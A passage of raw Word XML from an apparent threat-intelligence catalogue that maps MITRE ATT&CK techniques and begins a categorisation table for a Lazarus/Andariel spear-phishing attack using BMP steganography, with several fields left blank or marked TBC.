          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1027.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00461F9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37AC07"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF5520"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1049', 'T1057']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2101522B"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB9EF2C"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1943A0"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16442665"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F81BF4A"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F94687A"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1105']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78EE0E" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295171D8" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="00A16DF2"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E98EDF5" w14:textId="6911085C" w:rsidR="00A16DF2" w:rsidRPr="005935F8" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEDB72F" w14:textId="7D41B0CC" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc110935503"/>
      <w:bookmarkStart w:id="35" w:name="_Toc153480842"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidR="007F5988" w:rsidRPr="007F5988">
        <w:t>Lazarus APT conceals malicious code within BMP image to drop its RAT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="59993E1F" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc110935504"/>
      <w:r>
        <w:t>Attack Categorisation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="3119"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="002D1D50" w14:paraId="31075752" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66F10001" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="002D1D50" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="37" w:name="OLE_LINK25"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="469A10E9" w14:textId="12C39E67" w:rsidR="00A16DF2" w:rsidRPr="002D1D50" w:rsidRDefault="008D2F63" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F879FBA" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="00387DCC" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C045CA" w:rsidRPr="00B857D7" w14:paraId="5CFEEF07" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07EE1838" w14:textId="77777777" w:rsidR="00C045CA" w:rsidRDefault="00C045CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5423BF2F" w14:textId="4146D06B" w:rsidR="00C045CA" w:rsidRDefault="00C045CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Andariel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A6A59AB" w14:textId="77777777" w:rsidR="00C045CA" w:rsidRPr="00387DCC" w:rsidRDefault="00C045CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="00B857D7" w14:paraId="731EC6C3" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01ADB9D6" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="007328DE" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00BF0071" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="007328DE" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">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3A809D49" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="00387DCC" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="00B857D7" w14:paraId="7020890E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EBC1E59" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E531BF" w14:textId="4FE2430A" w:rsidR="00A16DF2" w:rsidRPr="007328DE" w:rsidRDefault="00C60800" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>North Korea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B23824" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="00387DCC" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="00B857D7" w14:paraId="4692D82E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B36BEF8" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E4904AF" w14:textId="220CEAA6" w:rsidR="00A16DF2" w:rsidRDefault="00BF7395" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF7395">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>South Korea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0245B08E" w14:textId="0FCD6D2B" w:rsidR="00A16DF2" w:rsidRPr="00387DCC" w:rsidRDefault="00BF7395" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00B076C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="00272B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00272B0A" w:rsidRPr="00272B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>n this blog we documented a spear phishing attack operated by this APT group that has targeted South Korea</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="00B857D7" w14:paraId="7CF6A234" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A7C3715" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A59C6FE" w14:textId="023DAE9A" w:rsidR="00A16DF2" w:rsidRDefault="002A12D2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security Researchers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4133D81D" w14:textId="264D45EF" w:rsidR="00A16DF2" w:rsidRPr="00387DCC" w:rsidRDefault="002A12D2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00E00522" w:rsidRPr="00E00522">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Lazarus used a complex targeted phishing attack against security researchers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="00B857D7" w14:paraId="7C0CBDBD" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB9A4A5" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1862F0EB" w14:textId="16E3F532" w:rsidR="004A7A8B" w:rsidRDefault="004A7A8B" w:rsidP="004A7A8B">
            <w:r>
              <w:t>Exfiltration (confidentiality) [UNCLEAR]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18EE1C3F" w14:textId="3B227D1E" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01BE4940" w14:textId="0B4AC7A5" w:rsidR="00A16DF2" w:rsidRDefault="00723129" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Presumably exfiltrating research knowledge/status etc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="00B857D7" w14:paraId="488B3951" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD80349" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D02C93B" w14:textId="5940362C" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EEEC1BD" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="00B857D7" w14:paraId="3CE8187F" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2022A11C" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B8B69FD" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E6DFF4D" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="7C5BBC88" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA1537F" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0D2214" w14:textId="20F48B57" w:rsidR="00947A0B" w:rsidRDefault="00737B9C" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74E1252A"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5EB3E64B" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="665CAC68" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C4F0D7E" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC549FA" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
